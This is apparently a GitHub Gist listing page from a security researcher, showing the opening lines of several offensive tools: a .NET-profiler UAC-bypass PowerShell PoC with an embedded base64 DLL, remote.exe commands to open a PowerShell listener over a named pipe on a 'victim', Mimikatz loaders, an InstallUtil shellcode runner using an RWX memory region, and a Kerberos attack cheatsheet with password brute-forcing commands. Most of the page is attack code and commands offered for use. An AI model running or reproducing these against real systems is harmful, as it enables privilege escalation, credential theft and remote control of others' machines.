Skip to content

Instantly share code, notes, and snippets.

@clavoillotte
clavoillotte / UAC-dotnet-profiler-poc.ps1
Created September 13, 2017 18:16
PoC of UAC bypass with a .NET profiler DLL
# Bypass UAC with a .NET profiler DLL
# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
$DllBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADXHurFk3+ElpN/hJaTf4SWsR+Fl5B/hJaTf4WWkX+EligejJeRf4SWKB6Gl5J/hJZSaWNok3+ElgAAAAAAAAAAUEUAAGSGAwAgMyBZAAAAAAAAAADwACIgCwIOCgACAAAABgAAAAAAAAAQAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAQAAAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA4CEAACgAAAAAAAAAAAAAAAAwAAAMAAAAAAAAAAAAAAAAAAAAAAAAACAgAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAA7AAAAABAAAAACAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAARgIAAAAgAAAABAAAAAYAAAAAAAAAAAAAAAAAAEAAAEAucGRhdGEAAAwAAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@clavoillotte
clavoillotte / win_remote.txt
Last active October 29, 2017 22:40 — forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@clavoillotte
clavoillotte / katz.cs
Created August 6, 2018 14:10
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
Import-Module NtObjectManager
<#
Function to kill all processes which are using a locked file.
#>
function Kill-FileLocker {
param(
[Parameter(Mandatory)]
[string]$Path
)
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
[Flags()]
enum RegistryOptions {
CloseKey = 0x00000001
QuerySecurityKey = 0x00000002
SetSecurityKey = 0x00000004
EnumerateValueKey = 0x00000010
QueryMultipleValueKey = 0x00000020
SetInformationKey = 0x00000040
FlushKey = 0x00000080
@clavoillotte
clavoillotte / rwxHunter.cs
Created July 3, 2019 14:56 — forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@clavoillotte
clavoillotte / Tasks.cs
Created August 3, 2019 08:53
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@clavoillotte
clavoillotte / kerberos_attacks_cheatsheet.md
Created September 9, 2019 18:05 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: